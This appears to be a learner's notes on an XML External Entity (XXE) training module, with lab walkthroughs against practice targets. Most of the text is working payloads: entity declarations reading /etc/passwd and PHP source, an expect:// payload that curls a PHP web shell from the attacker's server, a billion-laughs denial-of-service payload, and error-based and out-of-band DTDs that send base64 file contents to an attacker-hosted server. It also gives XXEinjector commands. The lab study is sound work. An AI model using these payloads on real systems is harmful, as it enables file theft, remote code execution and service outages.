XML External Entity (XXE) Injection
Tag
The keys of an XML document, usually wrapped with (<
/>
) characters.
<date>
Entity
XML variables, usually wrapped with (&
/;
) characters.
<
Element
The root element or any of its child elements, and its value is stored in between a start-tag and an end-tag.
<date>01-01-2022</date>
Attribute
Optional specifications for any element that are stored in the tags, which may be used by the XML parser.
version="1.0"
/encoding="UTF-8"
Declaration
Usually the first line of an XML document, and defines the XML version and encoding to use when parsing it.
<?xml version="1.0" encoding="UTF-8"?>
Furthermore, some characters are used as part of an XML document structure, like <
, >
, &
, or "
. So, if we need to use them in an XML document, we should replace them with their corresponding entity references (e.g. <
, >
, &
, "
). Finally, we can write comments in XML documents between <!--
and -->
, similar to HTML documents.
Local File Disclosure
Identifying
The first step in identifying potential XXE vulnerabilities is finding web pages that accept an XML user input. We can start the exercise at the end of this section, which has a Contact Form
:

If we fill the contact form and click on Send Data
, then intercept the HTTP request with Burp, we get the following request:

As we can see, the form appears to be sending our data in an XML format to the web server, making this a potential XXE testing target. Suppose the web application uses outdated XML libraries, and it does not apply any filters or sanitization on our XML input. In that case, we may be able to exploit this XML form to read local files.
If we send the form without any modification, we get the following message:

We see that the value of the email
element is being displayed back to us on the page. To print the content of an external file to the page, we should note which elements are being displayed, such that we know which elements to inject into
. In some cases, no elements may be displayed, which we will cover how to exploit in the upcoming sections.
For now, we know that whatever value we place in the <email></email>
element gets displayed in the HTTP response. So, let us try to define a new entity and then use it as a variable in the email
element to see whether it gets replaced with the value we defined.
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
Note: In our example, the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally, so we added a new DTD before defining our entity. If the
DOCTYPE
was already declared in the XML request, we would just add theENTITY
element to it.
Now, we should have a new XML entity called company
, which we can reference with &company;
. So, instead of using our email in the email
element, let us try using &company;
, and see whether it will be replaced with the value we defined (Inlane Freight
):

As we can see, the response did use the value of the entity we defined (Inlane Freight
) instead of displaying &company;
, indicating that we may inject XML code. In contrast, a non-vulnerable web application would display (&company;
) as a raw value. This confirms that we are dealing with a web application vulnerable to XXE
.
Note: Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the
Content-Type
header toapplication/xml
, and then convert the JSON data to XML with an online tool. If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.
Reading Sensitive Files
Now that we can define new internal XML entities let's see if we can define external XML entities. Doing so is fairly similar to what we did earlier, but we'll just add the SYSTEM
keyword and define the external reference path after it, as we have learned in the previous section:
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
Let us now send the modified request and see whether the value of our external XML entity gets set to the file we reference:

We see that we did indeed get the content of the /etc/passwd
file, meaning that we have successfully exploited the XXE vulnerability to read local files
. This enables us to read the content of sensitive files, like configuration files that may contain passwords or other sensitive files like an id_rsa
SSH key of a specific user, which may grant us access to the back-end server. We can refer to the File Inclusion / Directory Traversal module to see what attacks can be carried out through local file disclosure.
Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
Reading Source Code
This would allow us to perform a Whitebox Penetration Test
to unveil more vulnerabilities in the web application, or at the very least reveal secret configurations like database passwords or API keys.
So, let us see if we can use the same attack to read the source code of the index.php
file, as follows:

As we can see, this did not work, as we did not get any content. This happened because the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity
. If a file contains some of XML's special characters (e.g. <
/>
/&
), it would break the external entity reference and not be used for the reference.
Luckily, PHP provides wrapper filters that allow us to base64 encode certain resources 'including files', in which case the final base64 output should not break the XML format. To do so, instead of using file://
as our reference, we will use PHP's php://filter/
wrapper. With this filter, we can specify the convert.base64-encode
encoder as our filter, and then add an input resource (e.g. resource=index.php
), as follows:
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
With that, we can send our request, and we will get the base64 encoded string of the index.php
file:

We can select the base64 string, click on Burp's Inspector tab (on the right pane), and it will show us the decoded file. For more on PHP filters, you can refer to the File Inclusion / Directory Traversal module.
This trick only works with PHP web applications.
Remote Code Execution with XXE
In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for ssh
keys, or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server. If these do not work, we may still be able to execute commands on PHP-based web applications through the PHP://expect
filter, though this requires the PHP expect
module to be installed and enabled.
If the XXE directly prints its output 'as shown in this section', then we can execute basic commands as expect://id
, and the page should print the command output.
The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands
eldeim@htb[/htb]$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
eldeim@htb[/htb]$ sudo python3 -m http.server 80
Now, we can use the following XML code to execute a curl
command that downloads our web shell into the remote server:
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Note: We replaced all spaces in the above XML code with
$IFS
, to avoid breaking the XML syntax. Furthermore, many other characters like|
,>
, and{
may break the code, so we should avoid using them.
Once we send the request, we should receive a request on our machine for the shell.php
file, after which we can interact with the web shell on the remote server for code execution.
Note: The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.
Other XXE Attacks
The Server-Side Attacks module thoroughly covers SSRF, and the same techniques can be carried with XXE attacks.
Finally, one common use of XXE attacks is causing a Denial of Service (DOS) to the hosting web server, with the use the following payload:
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name></name>
<tel></tel>
<email>&a10;</email>
<message></message>
</root>
This payload defines the a0
entity as DOS
, references it in a1
multiple times, references a1
in a2
, and so on until the back-end server's memory runs out due to the self-reference loops. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference
. Try it against this exercise, and see if it works.
PoCs - Questions
Try to read the content of the 'connection.php' file, and submit the value of the 'api_key' as the answer
First, I intercept the peticion and see the body -->


I can see, it reflected me my email, so i wll be to identify el XXE
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>

Nice! now I will try it give me the /connection.php file -->


Advanced File Disclosure
Advanced Exfiltration with CDATA
To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA
tag (e.g. <![CDATA[ FILE_CONTENT ]]>
). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
One easy way to tackle this issue would be to define a begin
internal entity with <![CDATA[
, an end
internal entity with ]]>
, and then place our external entity file in between, and it should be considered as a CDATA
element, as follows:
<!DOCTYPE email [
<!ENTITY begin "<![CDATA[">
<!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY end "]]>">
<!ENTITY joined "&begin;&file;&end;">
]>
After that, if we reference the &joined;
entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities
, so we will have to find a better way to do so.
To bypass this limitation, we can utilize XML Parameter Entities
, a special type of entity that starts with a %
character and can only be used within the DTD. What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:
<!ENTITY joined "%begin;%file;%end;">
So, let's try to read the submitDetails.php
file by first storing the above line in a DTD file (e.g. xxe.dtd
), host it on our machine, and then reference it as an external entity on the target web application, as follows:
eldeim@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
eldeim@htb[/htb]$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Now, we can reference our external entity (xxe.dtd
) and then print the &joined;
entity we defined above, which should contain the content of the submitDetails.php
file, as follows:
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
...
<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->
Once we write our xxe.dtd
file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the submitDetails.php
file:

Note: In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section.
This trick can become very handy when the basic XXE method does not work or when dealing with other web development frameworks. Try to use this trick to read other files
.
Error Based XXE
First, let's try to send malformed XML data, and see if the web application displays any errors. To do so, we can delete any of the closing tags, change one of them, so it does not close (e.g. <roo>
instead of <root>
), or just reference a non-existing entity, as follows:

To do so, we will use a similar technique to what we used earlier. First, we will host a DTD file that contains the following payload:
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
The above payload defines the file
parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity;
does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file;
as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.
Now, we can call our external DTD script, and then reference the error
entity, as follows:
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the /etc/hosts
file as follows:

This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"
). However, this method is not as reliable as the previous method for reading source files
, as it may have length limitations, and certain special characters may still break it.
PoCs - Questions
Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').
First I try with a basic CDATA but it did not work ...
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.15.156:8000/xxe.dtd">
%xxe;
]>

So i try an Error Based XXE, i will be to delete the heads root -->

NICE! it did not give us any error, so... create the "malware" -->
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
##
python3 -m http.server 8000
Then I modified the petition to refer to my hosted dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.15.156:8000/xxe.dtd">
%xxe;
]>
<root>
<name>test</name>
<tel>12345</tel>
<email>&joined;
</email>
<message>test</message>
</root>
NOTE: we refer to
&joined
which is the name of the entity on our hosted dtd

So... It didnt work... i will try another error, i will modify the url /error/... -->

So now I’ll try to generate a dtd, host it and then call it from the petition:
## Create exploit.dtd
<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
## then
python3 -m http.server 8090
NOTE: save the previous xml into a
exploit.dtd

<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://10.10.15.156:8000/exploit.dtd">
%remote;
%error;
]>
&remote;

Blind Data Exfiltration
For such cases, we can utilize a method known as Out-of-band (OOB) Data Exfiltration
, which is often used in similar blind cases with many web attacks, like blind SQL injections, blind command injections, blind XSS, and of course, blind XXE. Both the Cross-Site Scripting (XSS) and the Whitebox Pentesting 101: Command Injections modules discussed similar attacks, and here we will utilize a similar attack, with slight modifications to fit our XXE vulnerability.
In our previous attacks, we utilized an out-of-band
attack since we hosted the DTD file in our machine and made the web application connect to us (hence out-of-band)
Out-of-band Data Exfiltration
To do so, we can first use a parameter entity for the content of the file we are reading while utilizing PHP filter to base64 encode it. Then, we will create another external parameter entity and reference it to our IP, and place the file
parameter value as part of the URL being requested over HTTP, as follows:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
If, for example, the file we want to read had the content of XXE_SAMPLE_DATA
, then the file
parameter would hold its base64 encoded data (WFhFX1NBTVBMRV9EQVRB
). When the XML tries to reference the external oob
parameter from our machine, it will request http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB
. Finally, we can decode the WFhFX1NBTVBMRV9EQVRB
string to get the content of the file. We can even write a simple PHP script that automatically detects the encoded file content, decodes it, and outputs it to the terminal:
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
So, we will first write the above PHP code to index.php
, and then start a PHP server on port 8000
, as follows:
eldeim@htb[/htb]$ vi index.php # here we write the above PHP code
eldeim@htb[/htb]$ php -S 0.0.0.0:8000
Now, to initiate our attack, we can use a similar payload to the one we used in the error-based attack, and simply add <root>&content;</root>
, which is needed to reference our entity and have it send the request to our machine with the file content:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
Then, we can send our request to the web application:

Finally, we can go back to our terminal, and we will see that we did indeed get the request and its decoded content:
PHP 7.4.3 Development Server (http://0.0.0.0:8000) started
10.10.14.16:46256 Accepted
10.10.14.16:46256 [200]: (null) /xxe.dtd
10.10.14.16:46256 Closing
10.10.14.16:46258 Accepted
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...SNIP...
Tip: In addition to storing our base64 encoded data as a parameter to our URL, we may utilize
DNS OOB Exfiltration
by placing the encoded data as a sub-domain for our URL (e.g.ENCODEDTEXT.our.website.com
), and then use a tool liketcpdump
to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.
Automated OOB Exfiltration
Although in some instances we may have to use the manual method we learned above, in many other cases, we can automate the process of blind XXE data exfiltration with tools. One such tool is XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
To use this tool for automated OOB exfiltration, we can first clone the tool to our machine, as follows:
eldeim@htb[/htb]$ git clone https://github.com/enjoiz/XXEinjector.git
Cloning into 'XXEinjector'...
...SNIP...
Once we have the tool, we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT
after it as a position locator for the tool:
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
Content-Length: 169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.201.94
Referer: http://10.129.201.94/blind/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
Now, we can run the tool with the --host
/--httpport
flags being our IP and port, the --file
flag being the file we wrote above, and the --path
flag being the file we want to read. We will also select the --oob=http
and --phpfilter
flags to repeat the OOB attack we did above, as follows:
eldeim@htb[/htb]$ ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
...SNIP...
[+] Sending request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:
We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the Logs
folder under the tool, and we can find our file there:
eldeim@htb[/htb]$ cat Logs/10.129.201.94/etc/passwd.log
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...SNIP..
Try to use the tool to repeat other XXE methods we learned.
PoCs - Questions
Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.
First, I captured the request and made one tho the /blind
endpoint:

Then I tried to perform an OOB XXE. First I created a dtd where I put the content of the file I wanted to read and apply a filter to it:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/327a6c4304ad5938eaf0efb6cc3e53dc.php">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://10.10.15.156:8000/?content=%file;'>">
Then I saved it into oob_xxe.dtd
. Afterwards I created a simple php script that automatically decodes any data I receive into the port 8000
:
<?phpif(isset($_GET['content'])){ error_log("\n\n" . base64_decode($_GET['content']));}?>
I saved it into index.php
. Then I started a php server it with:
php -S 0.0.0.0:8000
Now i modified the petition to call the external entity and forward the output to my php server:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://10.10.15.156:8000/oob_xxe.dtd"> %remote; %oob;]><root>&content;</root>


Last updated